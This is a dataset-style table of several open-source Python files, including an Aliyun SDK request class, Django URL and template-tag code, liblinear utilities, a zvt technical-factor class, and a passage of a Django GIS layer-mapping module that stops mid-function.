blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2578528564d2c4d90da1640f3c12ae6c73e0d8af | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-arms/aliyunsdkarms/request/v20190808/AddAliClusterIdsToPrometheusGlobalViewRequest.py | 608724ae8db521efd090e0e954135fd3239ee643 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,942 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkarms.endpoint import endpoint_data
class AddAliClusterIdsToPrometheusGlobalViewRequest(RpcRequest):
    """ARMS (version 2019-08-08) RPC request that attaches Alibaba Cloud
    cluster ids to a Prometheus global view.

    All request data travels as query parameters on a POST call; each
    parameter gets a matching get/set accessor pair below.
    """

    def __init__(self):
        RpcRequest.__init__(self, 'ARMS', '2019-08-08', 'AddAliClusterIdsToPrometheusGlobalView', 'arms')
        self.set_method('POST')
        # Wire up the endpoint tables only when the installed SDK core
        # exposes them on this request class.
        if hasattr(self, "endpoint_map"):
            self.endpoint_map = endpoint_data.getEndpointMap()
        if hasattr(self, "endpoint_regional"):
            self.endpoint_regional = endpoint_data.getEndpointRegional()

    def get_GlobalViewClusterId(self):  # String
        params = self.get_query_params()
        return params.get('GlobalViewClusterId')

    def set_GlobalViewClusterId(self, GlobalViewClusterId):  # String
        self.add_query_param('GlobalViewClusterId', GlobalViewClusterId)

    def get_ClusterIds(self):  # String
        params = self.get_query_params()
        return params.get('ClusterIds')

    def set_ClusterIds(self, ClusterIds):  # String
        self.add_query_param('ClusterIds', ClusterIds)

    def get_GroupName(self):  # String
        params = self.get_query_params()
        return params.get('GroupName')

    def set_GroupName(self, GroupName):  # String
        self.add_query_param('GroupName', GroupName)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
5a8fa192e306fa2337bd2ef329ae9a46e3d48ae0 | 6def8685a0de2e8df907834392a93205eb1d4f5f | /backend/msm_tc545_dev_14821/urls.py | 26cf4c94cc4093d986a29bd7d46d15863c9235c8 | [] | no_license | crowdbotics-apps/msm-tc545-dev-14821 | 03c1c0212e86f41bb1f28703d0b3a0312d278e60 | 2384578310b6e89bf4abd22d47c62e6290ab4e60 | refs/heads/master | 2023-02-15T22:32:10.980144 | 2021-01-07T02:20:27 | 2021-01-07T02:20:27 | 311,251,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,970 | py | """msm_tc545_dev_14821 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi

# URL routes for the MSM-TC545 project. Order matters: Django uses the
# first pattern that matches.
urlpatterns = [
    path("", include("home.urls")),
    path("accounts/", include("allauth.urls")),
    path("api/v1/", include("home.api.v1.urls")),
    path("admin/", admin.site.urls),
    path("users/", include("users.urls", namespace="users")),
    path("rest-auth/", include("rest_auth.urls")),
    # Override email confirm to use allauth's HTML view instead of rest_auth's API view
    path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
    path("rest-auth/registration/", include("rest_auth.registration.urls")),
    # NOTE(review): "home.urls" is also included at "" above, so these views
    # are reachable under two prefixes — presumably intentional; confirm.
    path("home/", include("home.urls")),
]

# Branding text shown in the Django admin.
admin.site.site_header = "MSM-TC545"
admin.site.site_title = "MSM-TC545 Admin Portal"
admin.site.index_title = "MSM-TC545 Admin"

# swagger: drf_yasg schema view serving interactive API docs.
api_info = openapi.Info(
    title="MSM-TC545 API",
    default_version="v1",
    description="API documentation for MSM-TC545 App",
)

schema_view = get_schema_view(
    api_info,
    public=True,
    # Docs require an authenticated user.
    permission_classes=(permissions.IsAuthenticated,),
)

urlpatterns += [
    path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
d07a82c489ce5625ab702e7ed76c4caa890f41f0 | c11c27b07086e97c633a833d37787474724bd2d2 | /src/IJB-A/identification/train_svm/liblinear-2.1/python/liblinearutil.py | cb5e60beed8eaa93b579424a171d945e2c86b4c1 | [
"MIT",
"BSD-3-Clause"
] | permissive | willyspinner/High-Performance-Face-Recognition | d1826a73653dede6b43799439e4fb692f119c70b | c5caad61be97fd20f9c47a727278ff938dc5cc8f | refs/heads/master | 2020-06-22T16:36:29.663302 | 2019-07-19T09:41:47 | 2019-07-19T09:41:47 | 197,746,624 | 0 | 0 | MIT | 2019-07-19T09:42:00 | 2019-07-19T09:41:59 | null | UTF-8 | Python | false | false | 8,612 | py | #!/usr/bin/env python
import os, sys
sys.path = [os.path.dirname(os.path.abspath(__file__))] + sys.path
from liblinear import *
from liblinear import __all__ as liblinear_all
from ctypes import c_double
__all__ = ['svm_read_problem', 'load_model', 'save_model', 'evaluations',
'train', 'predict'] + liblinear_all
def svm_read_problem(data_file_name):
	"""
	svm_read_problem(data_file_name) -> [y, x]

	Read LIBSVM-format data from data_file_name and return labels y
	and data instances x (a list of {feature_index: value} dicts).
	"""
	prob_y = []
	prob_x = []
	# Use a context manager so the file handle is closed deterministically
	# (the original left the handle open until garbage collection).
	with open(data_file_name) as data_file:
		for line in data_file:
			line = line.split(None, 1)
			# In case an instance with all zero features
			if len(line) == 1: line += ['']
			label, features = line
			xi = {}
			for e in features.split():
				ind, val = e.split(":")
				xi[int(ind)] = float(val)
			prob_y += [float(label)]
			prob_x += [xi]
	return (prob_y, prob_x)
def load_model(model_file_name):
	"""
	load_model(model_file_name) -> model

	Load a LIBLINEAR model from model_file_name and return it,
	or None (after printing a message) when the file cannot be opened.
	"""
	raw_model = liblinear.load_model(model_file_name.encode())
	if raw_model:
		return toPyModel(raw_model)
	print("can't open model file %s" % model_file_name)
	return None
def save_model(model_file_name, model):
	"""
	save_model(model_file_name, model) -> None

	Save a LIBLINEAR model to the file model_file_name.
	"""
	encoded_name = model_file_name.encode()
	liblinear.save_model(encoded_name, model)
def evaluations(ty, pv):
	"""
	evaluations(ty, pv) -> (ACC, MSE, SCC)

	Calculate accuracy, mean squared error and squared correlation coefficient
	using the true values (ty) and predicted values (pv).

	Raises ValueError when ty and pv differ in length. SCC is NaN when
	either sequence has zero variance (correlation is undefined).
	"""
	if len(ty) != len(pv):
		raise ValueError("len(ty) must equal to len(pv)")
	total_correct = total_error = 0
	sumv = sumy = sumvv = sumyy = sumvy = 0
	# Single pass accumulating the sums needed for ACC, MSE and SCC.
	for v, y in zip(pv, ty):
		if y == v:
			total_correct += 1
		total_error += (v-y)*(v-y)
		sumv += v
		sumy += y
		sumvv += v*v
		sumyy += y*y
		sumvy += v*y
	l = len(ty)
	ACC = 100.0*total_correct/l
	MSE = total_error/l
	try:
		SCC = ((l*sumvy-sumv*sumy)*(l*sumvy-sumv*sumy))/((l*sumvv-sumv*sumv)*(l*sumyy-sumy*sumy))
	except ZeroDivisionError:
		# Narrowed from a bare `except:`: only a zero-variance denominator
		# can fail here, and it must not mask unrelated errors.
		SCC = float('nan')
	return (ACC, MSE, SCC)
def train(arg1, arg2=None, arg3=None):
	"""
	train(y, x [, options]) -> model | ACC
	train(prob [, options]) -> model | ACC
	train(prob, param) -> model | ACC

	Train a model from data (y, x) or a problem prob using
	'options' or a parameter param.

	If '-v' is specified in 'options' (i.e., cross validation)
	either accuracy (ACC) or mean-squared error (MSE) is returned.

	options:
	    -s type : set type of solver (default 1)
	      for multi-class classification
	         0 -- L2-regularized logistic regression (primal)
	         1 -- L2-regularized L2-loss support vector classification (dual)
	         2 -- L2-regularized L2-loss support vector classification (primal)
	         3 -- L2-regularized L1-loss support vector classification (dual)
	         4 -- support vector classification by Crammer and Singer
	         5 -- L1-regularized L2-loss support vector classification
	         6 -- L1-regularized logistic regression
	         7 -- L2-regularized logistic regression (dual)
	      for regression
	        11 -- L2-regularized L2-loss support vector regression (primal)
	        12 -- L2-regularized L2-loss support vector regression (dual)
	        13 -- L2-regularized L1-loss support vector regression (dual)
	    -c cost : set the parameter C (default 1)
	    -p epsilon : set the epsilon in loss function of SVR (default 0.1)
	    -e epsilon : set tolerance of termination criterion
	        -s 0 and 2
	            |f'(w)|_2 <= eps*min(pos,neg)/l*|f'(w0)|_2,
	            where f is the primal function, (default 0.01)
	        -s 11
	            |f'(w)|_2 <= eps*|f'(w0)|_2 (default 0.001)
	        -s 1, 3, 4, and 7
	            Dual maximal violation <= eps; similar to liblinear (default 0.)
	        -s 5 and 6
	            |f'(w)|_inf <= eps*min(pos,neg)/l*|f'(w0)|_inf,
	            where f is the primal function (default 0.01)
	        -s 12 and 13
	            |f'(alpha)|_1 <= eps |f'(alpha0)|,
	            where f is the dual function (default 0.1)
	    -B bias : if bias >= 0, instance x becomes [x; bias]; if < 0, no bias term added (default -1)
	    -wi weight: weights adjust the parameter C of different classes (see README for details)
	    -v n: n-fold cross validation mode
	    -q : quiet mode (no outputs)
	"""
	# Normalize the two calling conventions into (prob, param).
	prob, param = None, None
	if isinstance(arg1, (list, tuple)):
		# train(y, x [, options])
		assert isinstance(arg2, (list, tuple))
		y, x, options = arg1, arg2, arg3
		prob = problem(y, x)
		param = parameter(options)
	elif isinstance(arg1, problem):
		# train(prob [, options]) or train(prob, param)
		prob = arg1
		if isinstance(arg2, parameter):
			param = arg2
		else:
			param = parameter(arg2)
	if prob == None or param == None:
		raise TypeError("Wrong types for the arguments")

	prob.set_bias(param.bias)
	liblinear.set_print_string_function(param.print_func)
	# The C library validates the (prob, param) pair; surface its message.
	err_msg = liblinear.check_parameter(prob, param)
	if err_msg:
		raise ValueError('Error: %s' % err_msg)

	if param.flag_find_C:
		# -C mode: search for the best C via cross validation in the C library.
		nr_fold = param.nr_fold
		best_C = c_double()
		best_rate = c_double()
		max_C = 1024
		if param.flag_C_specified:
			start_C = param.C
		else:
			start_C = -1.0
		liblinear.find_parameter_C(prob, param, nr_fold, start_C, max_C, best_C, best_rate)
		print("Best C = %lf CV accuracy = %g%%\n"% (best_C.value, 100.0*best_rate.value))
		return best_C.value,best_rate.value

	elif param.flag_cross_validation:
		# -v mode: return MSE for regression solvers, accuracy otherwise.
		l, nr_fold = prob.l, param.nr_fold
		target = (c_double * l)()
		liblinear.cross_validation(prob, param, nr_fold, target)
		ACC, MSE, SCC = evaluations(prob.y[:l], target[:l])
		if param.solver_type in [L2R_L2LOSS_SVR, L2R_L2LOSS_SVR_DUAL, L2R_L1LOSS_SVR_DUAL]:
			print("Cross Validation Mean squared error = %g" % MSE)
			print("Cross Validation Squared correlation coefficient = %g" % SCC)
			return MSE
		else:
			print("Cross Validation Accuracy = %g%%" % ACC)
			return ACC
	else:
		# Plain training: wrap the C model pointer in a Python-managed model.
		m = liblinear.train(prob, param)
		m = toPyModel(m)
		return m
def predict(y, x, m, options=""):
	"""
	predict(y, x, m [, options]) -> (p_labels, p_acc, p_vals)

	Predict data (y, x) with the SVM model m.
	options:
	    -b probability_estimates: whether to output probability estimates, 0 or 1 (default 0); currently for logistic regression only
	    -q quiet mode (no outputs)

	The return tuple contains
	p_labels: a list of predicted labels
	p_acc: a tuple including accuracy (for classification), mean-squared
	       error, and squared correlation coefficient (for regression).
	p_vals: a list of decision values or probability estimates (if '-b 1'
	        is specified). If k is the number of classes, for decision values,
	        each element includes results of predicting k binary-class
	        SVMs. if k = 2 and solver is not MCSVM_CS, only one decision value
	        is returned. For probabilities, each element contains k values
	        indicating the probability that the testing instance is in each class.
	        Note that the order of classes here is the same as 'model.label'
	        field in the model structure.
	"""
	def info(s):
		print(s)

	# Parse the option string: -b toggles probabilities, -q silences output.
	predict_probability = 0
	argv = options.split()
	i = 0
	while i < len(argv):
		if argv[i] == '-b':
			i += 1
			predict_probability = int(argv[i])
		elif argv[i] == '-q':
			# Rebind `info` to the module-level no-op printer.
			info = print_null
		else:
			raise ValueError("Wrong options")
		i+=1

	solver_type = m.param.solver_type
	nr_class = m.get_nr_class()
	nr_feature = m.get_nr_feature()
	is_prob_model = m.is_probability_model()
	bias = m.bias
	# When the model was trained with a bias term, append it as an extra
	# feature node; otherwise use the -1 terminator convention.
	if bias >= 0:
		biasterm = feature_node(nr_feature+1, bias)
	else:
		biasterm = feature_node(-1, bias)
	pred_labels = []
	pred_values = []

	if predict_probability:
		if not is_prob_model:
			raise TypeError('probability output is only supported for logistic regression')
		prob_estimates = (c_double * nr_class)()
		for xi in x:
			# Convert the instance to a C feature_node array, then splice in
			# the bias term just before the terminating node.
			xi, idx = gen_feature_nodearray(xi, feature_max=nr_feature)
			xi[-2] = biasterm
			label = liblinear.predict_probability(m, xi, prob_estimates)
			values = prob_estimates[:nr_class]
			pred_labels += [label]
			pred_values += [values]
	else:
		# Decision-value path: binary models emit a single value.
		if nr_class <= 2:
			nr_classifier = 1
		else:
			nr_classifier = nr_class
		dec_values = (c_double * nr_classifier)()
		for xi in x:
			xi, idx = gen_feature_nodearray(xi, feature_max=nr_feature)
			xi[-2] = biasterm
			label = liblinear.predict_values(m, xi, dec_values)
			values = dec_values[:nr_classifier]
			pred_labels += [label]
			pred_values += [values]
	# Without true labels, evaluate against zeros so the tuple shape holds.
	if len(y) == 0:
		y = [0] * len(x)
	ACC, MSE, SCC = evaluations(y, pred_labels)
	l = len(y)
	if m.is_regression_model():
		info("Mean squared error = %g (regression)" % MSE)
		info("Squared correlation coefficient = %g (regression)" % SCC)
	else:
		info("Accuracy = %g%% (%d/%d) (classification)" % (ACC, int(l*ACC/100), l))

	return pred_labels, (ACC, MSE, SCC), pred_values
| [
"noreply@github.com"
] | willyspinner.noreply@github.com |
01f79e945aa8ede3d9d38abea3cc7b1fb8882ac5 | 0c8214d0d7827a42225b629b7ebcb5d2b57904b0 | /examples/fileio/E002_Packages/main.py | 19e09b50a6ebd79e9cb6f9d8ecd726852d7fd3a3 | [] | no_license | mertturkmenoglu/python-examples | 831b54314410762c73fe2b9e77aee76fe32e24da | 394072e1ca3e62b882d0d793394c135e9eb7a56e | refs/heads/master | 2020-05-04T15:42:03.816771 | 2020-01-06T19:37:05 | 2020-01-06T19:37:05 | 179,252,826 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # Example 022: Package example
# Demonstrates the different ways modules of the Calculator package
# can be imported and addressed.
from Calculator.Math import add
import Calculator.Test.testFile
import Calculator.UI.button as button

# `import Calculator.Test.testFile` also binds the top-level `Calculator`
# name in this namespace, which is why the dotted calls below resolve.
Calculator.print_info()
add.print_info()
Calculator.Test.print_info()
Calculator.Test.testFile.print_info()
button.print_info()
Calculator.UI.print_info()
| [
"mertturkmenoglu99@gmail.com"
] | mertturkmenoglu99@gmail.com |
cded64f961102cd11ec1e54dc84e92ce55d24117 | 8cccdb1ca93d1b7ed690eb096522262523948a72 | /accounting/apps/books/templatetags/nav.py | 689c89c26b6fdc2af3ddbe4cf8790bda85d185e3 | [
"MIT"
] | permissive | newhub-spec/django-accounting | 6b886378219dbed1d4f2ee34e71be198a7b28eb5 | 12b01a944d368ce717b57957d26d7aa4ecd04285 | refs/heads/master | 2020-08-21T08:06:41.318805 | 2019-10-19T06:33:41 | 2019-10-19T06:33:41 | 216,116,659 | 0 | 0 | MIT | 2019-10-18T22:35:01 | 2019-10-18T22:35:01 | null | UTF-8 | Python | false | false | 438 | py | # encoding: utf-8
import re
from django import template
register = template.Library()
@register.simple_tag
def active(request, pattern, exact_match=False):
    """Return 'active' when the request path matches *pattern*, '' otherwise.

    With ``exact_match`` the pattern is anchored at both ends (adding
    '^'/'$' only when missing) so just a full-path match counts.
    """
    if exact_match:
        prefix = '' if pattern.startswith('^') else '^'
        suffix = '' if pattern.endswith('$') else '$'
        pattern = prefix + pattern + suffix
    matched = hasattr(request, 'path') and re.search(pattern, request.path)
    return 'active' if matched else ''
| [
"dulacpier@gmail.com"
] | dulacpier@gmail.com |
24274aec2247b51c41ce5a5a4b1cd459f9cc1319 | 34799a9e04b8e22c9d364d1f5dcaea05ea204fcb | /test-suite/tests/__init__.py | f1a56342ffdb3195695527f95065e03ae96c467d | [
"Apache-2.0"
] | permissive | ken-ebert/indy-agent | 90fa0da1f3cf0203ef0d88278c8f97753afb7ad9 | ecd8a2cc927d762acf4c4263cc6d3fc115188c7e | refs/heads/master | 2020-04-01T15:42:59.523802 | 2018-10-17T23:24:18 | 2018-10-17T23:31:38 | 153,348,553 | 0 | 0 | Apache-2.0 | 2018-10-16T20:17:39 | 2018-10-16T20:17:39 | null | UTF-8 | Python | false | false | 695 | py | """ Module containing Agent Test Suite Tests.
"""
import asyncio
import pytest
from typing import Callable
from transport import BaseTransport
async def expect_message(transport: BaseTransport, timeout: int):
get_message_task = asyncio.ensure_future(transport.recv())
sleep_task = asyncio.ensure_future(asyncio.sleep(timeout))
finished, unfinished = await asyncio.wait(
[
get_message_task,
sleep_task
],
return_when=asyncio.FIRST_COMPLETED
)
if get_message_task in finished:
return get_message_task.result()
for task in unfinished:
task.cancel()
pytest.fail("No message received before timing out")
| [
"daniel.bluhm@sovrin.org"
] | daniel.bluhm@sovrin.org |
18d5543138466a911998784eecb91c9d030002f5 | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /important_man/company/seem_company_up_thing.py | 78bc48efc26459683f86fab76e7a748d4698894e | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py |
#! /usr/bin/env python
def think_able_day_about_long_woman(str_arg):
    """Echo *str_arg* to stdout."""
    print(str_arg)


def other_way(str_arg):
    """Print *str_arg* and then a fixed status line."""
    think_able_day_about_long_woman(str_arg)
    print('bad_work_and_long_time')


if __name__ == '__main__':
    other_way('next_week')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
1c5c34211e4bc00f464ac84a0e9215cdd9aa535b | 3c2cc8910c4a333a44d2d7b22489ef8d5ddb6a13 | /src/zvt/factors/technical_factor.py | d0cc199697d42ffd729a0796da9dfaf84c4a99b8 | [
"MIT"
] | permissive | zvtvz/zvt | 6341dc765177b1e99727207f1608b730cbbb705a | 03aee869fd432bb933d59ba419401cfc11501392 | refs/heads/master | 2023-08-28T10:05:29.185590 | 2023-08-01T10:19:03 | 2023-08-01T10:19:03 | 179,451,497 | 2,782 | 922 | MIT | 2023-04-04T09:31:03 | 2019-04-04T08:06:57 | Python | UTF-8 | Python | false | false | 3,256 | py | from typing import List, Union, Type, Optional
import pandas as pd
from zvt.api.kdata import get_kdata_schema, default_adjust_type
from zvt.contract import IntervalLevel, TradableEntity, AdjustType
from zvt.contract.factor import Factor, Transformer, Accumulator, FactorMeta
from zvt.domain import Stock
class TechnicalFactor(Factor, metaclass=FactorMeta):
    """A Factor computed on top of kdata (candlestick) records.

    Resolves the concrete kdata schema from the entity schema, level and
    adjust type, then delegates everything else to the Factor base class.
    """

    def __init__(
        self,
        entity_schema: Type[TradableEntity] = Stock,
        provider: str = None,
        entity_provider: str = None,
        entity_ids: List[str] = None,
        exchanges: List[str] = None,
        codes: List[str] = None,
        start_timestamp: Union[str, pd.Timestamp] = None,
        end_timestamp: Union[str, pd.Timestamp] = None,
        columns: List = None,
        filters: List = None,
        order: object = None,
        limit: int = None,
        level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
        category_field: str = "entity_id",
        time_field: str = "timestamp",
        keep_window: int = None,
        keep_all_timestamp: bool = False,
        fill_method: str = "ffill",
        effective_number: int = None,
        transformer: Transformer = None,
        accumulator: Accumulator = None,
        need_persist: bool = False,
        only_compute_factor: bool = False,
        factor_name: str = None,
        clear_state: bool = False,
        only_load_factor: bool = False,
        adjust_type: Union[AdjustType, str] = None,
    ) -> None:
        # Default column set: the standard OHLCV/turnover kdata columns.
        if columns is None:
            columns = [
                "id",
                "entity_id",
                "timestamp",
                "level",
                "open",
                "close",
                "high",
                "low",
                "volume",
                "turnover",
                "turnover_rate",
            ]

        # Stocks use backward adjustment (hfq, 后复权) by default.
        if not adjust_type:
            adjust_type = default_adjust_type(entity_type=entity_schema.__name__)

        self.adjust_type = adjust_type
        # Concrete kdata schema, e.g. Stock1dHfqKdata, derived from
        # entity type + level + adjust type.
        self.data_schema = get_kdata_schema(entity_schema.__name__, level=level, adjust_type=adjust_type)

        # Default factor name: lowercased class name suffixed with the level,
        # e.g. "technicalfactor_1d".
        if not factor_name:
            if type(level) == str:
                factor_name = f"{type(self).__name__.lower()}_{level}"
            else:
                factor_name = f"{type(self).__name__.lower()}_{level.value}"

        super().__init__(
            self.data_schema,
            entity_schema,
            provider,
            entity_provider,
            entity_ids,
            exchanges,
            codes,
            start_timestamp,
            end_timestamp,
            columns,
            filters,
            order,
            limit,
            level,
            category_field,
            time_field,
            keep_window,
            keep_all_timestamp,
            fill_method,
            effective_number,
            transformer,
            accumulator,
            need_persist,
            only_compute_factor,
            factor_name,
            clear_state,
            only_load_factor,
        )

    def drawer_sub_df_list(self) -> Optional[List[pd.DataFrame]]:
        # Extra sub-plot data for the drawer: the volume column only.
        return [self.factor_df[["volume"]]]
# the __all__ is generated
__all__ = ["TechnicalFactor"]
| [
"5533061@qq.com"
] | 5533061@qq.com |
10fc611f244c7439f29211b24a36261464ec5e9a | af05993925e3a7d57f074a26f3cd271efbeb1747 | /contrib/gis/utils/layermapping.py | a667e36095beba478e62cbf420776443498b10a8 | [] | no_license | tigerman-SFC/django_with_TimeStamp | b7a448a0f367d8e5761d32afb2dd1651926bc31d | 83708187b654ad157ad8d60410062b6d90c4a182 | refs/heads/master | 2021-01-06T20:39:47.412139 | 2017-08-07T05:37:42 | 2017-08-07T05:37:42 | 99,539,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,428 | py | # LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
For more information, please consult the GeoDjango documentation:
https://docs.djangoproject.com/en/dev/ref/contrib/gis/layermapping/
"""
import sys
from decimal import Decimal, InvalidOperation as DecimalInvalidOperation
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.gdal import (
CoordTransform, DataSource, GDALException, OGRGeometry, OGRGeomType,
SpatialReference,
)
from django.contrib.gis.gdal.field import (
OFTDate, OFTDateTime, OFTInteger, OFTInteger64, OFTReal, OFTString,
OFTTime,
)
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import connections, models, router, transaction
from django.utils import six
from django.utils.encoding import force_text
# LayerMapping exceptions.
class LayerMapError(Exception):
    """Base exception for all LayerMapping errors."""
    pass


class InvalidString(LayerMapError):
    """Raised when an OGR string value cannot be used for a model field."""
    pass


class InvalidDecimal(LayerMapError):
    """Raised when an OGR value cannot be converted to a valid Decimal."""
    pass


class InvalidInteger(LayerMapError):
    """Raised when an OGR value cannot be converted to a valid integer."""
    pass


class MissingForeignKey(LayerMapError):
    """Raised when a related model for a ForeignKey mapping cannot be found."""
    pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1: OGRGeomType('MultiPoint'),
2: OGRGeomType('MultiLineString'),
3: OGRGeomType('MultiPolygon'),
OGRGeomType('Point25D').num: OGRGeomType('MultiPoint25D'),
OGRGeomType('LineString25D').num: OGRGeomType('MultiLineString25D'),
OGRGeomType('Polygon25D').num: OGRGeomType('MultiPolygon25D'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField: OFTInteger,
models.BigAutoField: OFTInteger64,
models.IntegerField: (OFTInteger, OFTReal, OFTString),
models.FloatField: (OFTInteger, OFTReal),
models.DateField: OFTDate,
models.DateTimeField: OFTDateTime,
models.EmailField: OFTString,
models.TimeField: OFTTime,
models.DecimalField: (OFTInteger, OFTReal),
models.CharField: OFTString,
models.SlugField: OFTString,
models.TextField: OFTString,
models.URLField: OFTString,
models.BigIntegerField: (OFTInteger, OFTReal, OFTString),
models.SmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.TimeStampField: (OFTInteger) # Added By Inoue
}
def __init__(self, model, data, mapping, layer=0,
             source_srs=None, encoding='utf-8',
             transaction_mode='commit_on_success',
             transform=True, unique=None, using=None):
    """
    A LayerMapping object is initialized using the given Model (not an instance),
    a DataSource (or string path to an OGR-supported data file), and a mapping
    dictionary. See the module level docstring for more details and keyword
    argument usage.
    """
    # Getting the DataSource and the associated Layer: `data` may be a path
    # string or an already-opened DataSource.
    if isinstance(data, six.string_types):
        self.ds = DataSource(data, encoding=encoding)
    else:
        self.ds = data
    self.layer = self.ds[layer]

    # Database alias to write through; defaults to the router's choice.
    self.using = using if using is not None else router.db_for_write(model)
    self.spatial_backend = connections[self.using].ops

    # Setting the mapping & model attributes.
    self.mapping = mapping
    self.model = model

    # Checking the layer -- initialization of the object will fail if
    # things don't check out before hand.
    self.check_layer()

    # Getting the geometry column associated with the model (an
    # exception will be raised if there is no geometry column).
    if connections[self.using].features.supports_transform:
        self.geo_field = self.geometry_field()
    else:
        # Backend cannot transform geometries, so disable it outright.
        transform = False

    # Checking the source spatial reference system, and getting
    # the coordinate transformation object (unless the `transform`
    # keyword is set to False)
    if transform:
        self.source_srs = self.check_srs(source_srs)
        self.transform = self.coord_transform()
    else:
        self.transform = transform

    # Setting the encoding for OFTString fields, if specified.
    if encoding:
        # Making sure the encoding exists, if not a LookupError
        # exception will be thrown.
        from codecs import lookup
        lookup(encoding)
        self.encoding = encoding
    else:
        self.encoding = None

    if unique:
        self.check_unique(unique)
        transaction_mode = 'autocommit'  # Has to be set to autocommit.
        self.unique = unique
    else:
        self.unique = None

    # Setting the transaction decorator with the function in the
    # transaction modes dictionary.
    self.transaction_mode = transaction_mode
    if transaction_mode == 'autocommit':
        self.transaction_decorator = None
    elif transaction_mode == 'commit_on_success':
        self.transaction_decorator = transaction.atomic
    else:
        raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
# #### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
    "This checks the `fid_range` keyword."
    # Accepts a (start, stop[, step]) tuple/list, a ready-made slice,
    # or a falsy value meaning "no range restriction".
    if fid_range:
        if isinstance(fid_range, (tuple, list)):
            return slice(*fid_range)
        elif isinstance(fid_range, slice):
            return fid_range
        else:
            raise TypeError
    else:
        return None
def check_layer(self):
    """
    This checks the Layer metadata, and ensures that it is compatible
    with the mapping information and model. Unlike previous revisions,
    there is no need to increment through each feature in the Layer.

    Populates ``self.fields`` (mapping field name -> model field or
    related model) and, when a geometry field is mapped, sets
    ``self.geom_field`` and ``self.coord_dim``.
    """
    # The geometry field of the model is set here.
    # TODO: Support more than one geometry field / model.  However, this
    # depends on the GDAL Driver in use.
    self.geom_field = False
    self.fields = {}

    # Getting lists of the field names and the field types available in
    # the OGR Layer.
    ogr_fields = self.layer.fields
    ogr_field_types = self.layer.field_types

    # Function for determining if the OGR mapping field is in the Layer.
    def check_ogr_fld(ogr_map_fld):
        try:
            idx = ogr_fields.index(ogr_map_fld)
        except ValueError:
